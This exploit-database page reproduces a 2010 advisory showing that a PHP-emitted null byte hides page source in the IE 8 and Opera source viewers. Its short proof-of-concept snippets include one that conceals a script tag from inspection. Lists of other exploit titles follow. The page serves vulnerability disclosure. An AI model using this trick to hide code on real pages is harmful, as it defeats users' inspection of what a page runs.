Menu

Search for hundreds of thousands of exploits

"Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling"

Author

Exploit author

"Daniel Correa"

Platform

Exploit platform

windows

Release date

Exploit published date

2010-04-11

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# Exploit Title: IE/Opera source code viewer Null Character Handling
Vulnerability
# Date: 10/04/2010
# Author: Daniel Correa
# Software Link:
http://www.microsoft.com/windows/internet-explorer/default.aspx
# Software Link: http://www.opera.com/download/
# Version: Tested on IE 8, Opera 10.51
# Tested on: Windows XP; Windows 7 + default IE 8
# CVE :

# Description :
The vulnerability in the source code viewer in both browsers (IE &
Opera) is when they are processing the null control character (0×00),
including this character in the transmission message results in a
misunderstanding that is reflected in the concealment of the transmitted
message, only the code that is between valid tags is shown. In other
words, exploiting this vulnerability we can completely hide the source
code to the user of Internet Explorer and Opera browsers.

# Code:
The next code hide all the source code to source code viewer.
<?php
echo "\x00";
?>
Esto es un mensaje oculto
This is a hide message
Este es otro
Thie is another one
...
Como vemos podemos esconder cualquier mensaje
As we can see we can hide any message
<html>
<head>
<title>Titulo</title>
</head>
<body>
<h1>Hola mundo</h1>
</body>
</html>

And the next,only hide part of the code (The script part)
<html>
<head>
<title>Titulo</title>
</head>
<body>
<h1>Hello world</h1>
</body>
</html>
<?php
echo chr(0);
?>
<script>alert('This code is never seen');</script>



Package contain three proofs of concept:
http://www.sinfocol.org/archivos/2010/04/ie_opera_null.zip

-- 
Sinfocol
http://www.sinfocol.org

La información contenida en este mensaje es confidencial y puede ser legalmente privilegiada. Está destinado únicamente para el destinatario. El acceso a este correo electrónico por cualquier otra persona no está autorizado. Si usted no es el destinatario, cualquier revelación, copia, distribución o cualquier acción u omitido que se adopten en la confianza en él, está prohibida y puede ser ilegal.

The information in this email is confidential and may be legally privileged. It is intended solely for the addressee. Access to this email by anyone else is unauthorized. If you are not the intended recipient, any disclosure, copying, distribution or any action taken or omitted to be taken in reliance on it, is prohibited and may be unlawful.
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2017-07-18 "PEGA Platform <= 7.2 ML0 - Missing Access Control / Cross-Site Scripting" webapps multiple "Daniel Correa"
2012-08-07 "Dir2web - '/system/src/dispatcher.php?oid' SQL Injection" webapps php "Daniel Correa"
2010-04-11 "Microsoft Internet Explorer/Opera - Source Code viewer Null Character Handling" remote windows "Daniel Correa" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected